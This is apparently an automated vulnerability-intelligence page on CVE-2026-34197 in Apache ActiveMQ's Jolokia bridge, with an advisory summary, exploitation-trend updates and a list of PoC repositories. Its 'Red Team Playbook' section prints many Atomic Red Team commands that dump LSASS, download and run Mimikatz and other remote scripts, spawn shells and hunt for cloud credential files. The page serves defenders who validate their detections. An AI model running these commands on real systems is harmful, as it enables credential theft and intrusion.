CVE-2026-34197
Overview
This vulnerability is a code injection flaw caused by improper input validation and control of code generation within Apache ActiveMQ Broker's Jolokia JMX-HTTP bridge. The affected component is the Jolokia endpoint exposed at /api/jolokia/ on the web console, where the default access policy allows execution of operations on all ActiveMQ MBeans. The root cause lies in the BrokerService's acceptance of crafted discovery URIs that trigger loading of remote Spring XML application contexts before configuration validation, enabling injection of malicious code via bean instantiation.
Vulnerability Description
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue
Impact
An attacker with valid authentication can execute arbitrary commands on the broker's JVM by leveraging the vulnerable Jolokia endpoint, potentially leading to full system compromise. This enables execution of malicious code remotely, which can disrupt message broker operations, expose sensitive data, or facilitate lateral movement within the network. The attack requires only low-privileged authenticated access to the web console, making it feasible in environments with insufficient access controls.
Solution
Users should upgrade Apache ActiveMQ Broker to version 5.19.4 or 6.2.3 or later, as these versions include fixes for this vulnerability. Detailed patch instructions and advisory information are available in the vendor's security advisory at https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt. No alternative workarounds are specified; applying the vendor-recommended update is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Apache ActiveMQ Broker arises from improper input validation and control over code generation, specifically through the Jolokia JMX-HTTP bridge exposed at the web console. This bridge allows for remote management of ActiveMQ instances via JMX (Java Management Extensions) and, by default, permits execution operations on all ActiveMQ MBeans. An attacker with authenticated access can exploit this weakness by crafting a malicious discovery URI that manipulates the brokerConfig parameter within the VM transport. This manipulation leads to the loading of a remote Spring XML application context, which can result in arbitrary code execution on the broker's JVM.
Exploitation of this vulnerability can occur through several attack vectors. An authenticated user, who may have legitimate access to the ActiveMQ console, could leverage the crafted URI to invoke operations such as adding network connectors or connectors to the broker service. By doing so, the attacker can trigger the instantiation of singleton beans before the broker service validates the configuration. This premature instantiation allows the execution of arbitrary code via methods like Runtime.exec(), effectively granting the attacker control over the server environment. The potential for remote code execution poses a significant risk, as it can lead to unauthorized access to sensitive data, manipulation of messaging queues, or even complete compromise of the server.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on Apache ActiveMQ for messaging services. Given that many enterprises utilize this platform for critical applications, the ability to execute arbitrary code can result in severe business risks, including data breaches, service disruptions, and financial losses. Additionally, the exploitation of this vulnerability could lead to compliance violations, especially in regulated industries where data integrity and security are paramount. The potential for an attacker to gain elevated privileges and manipulate the messaging infrastructure can also have cascading effects on other interconnected systems, amplifying the overall risk.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to upgrade to the latest versions of Apache ActiveMQ, specifically versions 5.19.4 or 6.2.3, which address this security flaw. Regularly updating software and applying security patches is a fundamental practice in maintaining a secure environment. Additionally, organizations should review their access control policies to ensure that only authorized users have access to the JMX-HTTP bridge. Implementing network segmentation and firewall rules to restrict access to the ActiveMQ console can further reduce the attack surface. Monitoring and logging JMX operations can also aid in detecting suspicious activities, allowing for timely response to potential exploitation attempts.
In conclusion, the vulnerability present in Apache ActiveMQ Broker highlights the critical importance of input validation and access control in software design. The potential for arbitrary code execution through the exploitation of this flaw poses significant risks to organizations that utilize this messaging platform. By prioritizing timely updates, enforcing strict access controls, and maintaining vigilant monitoring practices, organizations can effectively mitigate the risks associated with this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2026-34197, accompanied by a significant increase in the Exploit Prediction Scoring System (EPSS) score. This surge aligns with the emergence of multiple new proof-of-concept exploit tools publicly available on open-source platforms, broadening the attacker toolkit and lowering the barrier for exploitation. Our telemetry indicates that adversaries are increasingly leveraging the Jolokia JMX-HTTP bridge vulnerability to execute arbitrary code on affected Apache ActiveMQ Brokers, underscoring an expanding threat landscape. The elevated EPSS score, now approaching the highest percentiles, reflects growing confidence in the exploitability of this vulnerability and suggests a heightened likelihood of widespread targeting. Consequently, the risk level for organizations running vulnerable ActiveMQ instances has risen, emphasizing the urgency for heightened detection and response capabilities to address this evolving threat.
Update 2 — June 07, 2026
The emergence of a Metasploit module targeting CVE-2026-34197 marks a pivotal shift in the exploit landscape, significantly lowering the technical barrier for adversaries to weaponize this vulnerability. While our telemetry indicates a marked reduction in detection activity, this decline likely reflects a transition from opportunistic scanning to more targeted exploitation attempts facilitated by the availability of this automated tool. Concurrently, the EPSS score’s increase to over 0.83, placing it near the top percentile, signals growing confidence in the vulnerability’s exploitability and an elevated probability of active exploitation campaigns. The proliferation of new proof-of-concept exploits and detection scripts further expands the toolkit accessible to threat actors, enhancing their capability to compromise vulnerable Apache ActiveMQ Brokers. Collectively, these developments elevate the threat level, underscoring an urgent need for defenders to recalibrate detection and response postures despite the current lull in broad scanning activity.
Update 3 — June 16, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-34197, accompanied by a measurable increase in the Exploit Prediction Scoring System (EPSS) rating. This upward trend in telemetry indicates that threat actors are intensifying efforts to leverage the Jolokia JMX-HTTP bridge vulnerability in Apache ActiveMQ Broker. The proliferation of publicly available proof-of-concept exploits and detection scripts continues to lower the barrier for adversaries, expanding the pool of potential attackers capable of remote code execution via the addNetworkConnector MBean operation. Although ransomware usage remains unconfirmed, the increased exploitation attempts suggest a heightened risk of this vulnerability being incorporated into broader attack campaigns. Consequently, the threat level has escalated from moderate to high, reflecting a growing likelihood of successful compromise in environments running vulnerable ActiveMQ versions. Defenders should recognize this shift as a signal of increased adversary interest and operational activity targeting this vector.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apache | Activemq | All |
cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
|
|
|
Apache | Activemq | All |
cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
|
|
|
Apache | Activemq Broker | All |
cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:*
|
|
|
Apache | Activemq Broker | All |
cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Apache ActiveMQ RCE via Jolokia addNetworkConnector
exploits/multi/http/apache_activemq_jolokia_rce
|
dinosn, h00die | Unknown | - | View |
GitHub PoCs (17)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Catherines77/ActiveMQ-EXPtools
Apache ActiveMQ漏洞综合利用工具(CVE-2015-5254,CVE-2016-3088,CVE-2022-41678,CVE-2023-46604,CVE-2024-32114,CVE-2026-34197,CVE-2026...
|
Catherines77 | 78 | 7 | 2026-04-20 | View |
|
dinosn/apache-activemq-rce-research
Apache ActiveMQ Classic RCE research: CVE-2026-34197 / CVE-2026-42588 bypass chain + hardened-6.2.6 audit findings + Cro...
|
dinosn | 8 | 3 | 2026-07-04 | View |
|
dinosn/CVE-2026-34197
CVE-2026-34197 activemq PoC
|
dinosn | 8 | 0 | 2026-04-08 | View |
|
DEVSECURITYSPRO/CVE-2026-34197
CVE-2026-34197 - Apache ActiveMQ RCE via Jolokia Endpoint PoC
|
DEVSECURITYSPRO | 4 | 0 | 2026-04-08 | View |
|
KONDORDEVSECURITYCORP/CVE-2026-34197
CVE-2026-34197 — Apache ActiveMQ RCE via Jolokia API | PoC Exploit
|
KONDORDEVSECURITYCORP | 2 | 0 | 2026-04-09 | View |
|
hnytgl/CVE-2026-34197
这是一个面向防守和内网排查的 Apache ActiveMQ Classic 暴露面检测工具,用于辅助评估 CVE-2026-34197 相关风险。
|
hnytgl | 1 | 0 | 2026-05-18 | View |
|
hnytgl/cve-2026-34197
|
hnytgl | 1 | 0 | 2026-05-18 | View |
|
xshysjhq/CVE-2026-34197-payload-Apache-ActiveMQ-
|
xshysjhq | 1 | 0 | 2026-04-20 | View |
|
0xBlackash/CVE-2026-34197
CVE-2026-34197
|
0xBlackash | 1 | 0 | 2026-04-08 | View |
|
AtoposX-J/CVE-2026-34197-Apache-ActiveMQ-RCE
CVE-2026-34197
|
AtoposX-J | 1 | 0 | 2026-04-09 | View |
|
pssec-io/CVE-2026-34197
Poc for CVE-2026-34197
|
pssec-io | 0 | 0 | 2026-07-08 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
asdasddqwdq29-a11y/CVE-2026-34197
Apache ActiveMQ RCE via Jolokia vulnerability analysis and reproduction notes
|
asdasddqwdq29-a11y | 0 | 0 | 2026-06-06 | View |
|
LAT-06/CVE-2026-34197
|
LAT-06 | 0 | 0 | 2026-05-18 | View |
|
rootdirective-sec/CVE-2026-34197-Lab
|
rootdirective-sec | 0 | 0 | 2026-05-08 | View |
|
keraattin/CVE-2026-34197
CVE-2026-34197: Apache ActiveMQ Classic RCE via Jolokia API (CVSS 8.8). Python & Nmap NSE detection scripts. A 13-year-o...
|
keraattin | 0 | 0 | 2026-04-14 | View |
|
hg0434hongzh0/CVE-2026-34197
POC
|
hg0434hongzh0 | 0 | 0 | 2026-04-10 | View |
Threat Feed
34 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: Apache, product: ActiveMQ
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-34197 |
| activemq.apache.org |
GitHub CVE
vendor-advisory
|
https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt |
| openwall.com |
NVD API
Mailing List
Third Party Advisory
|
http://www.openwall.com/lists/oss-security/2026/04/06/3 |
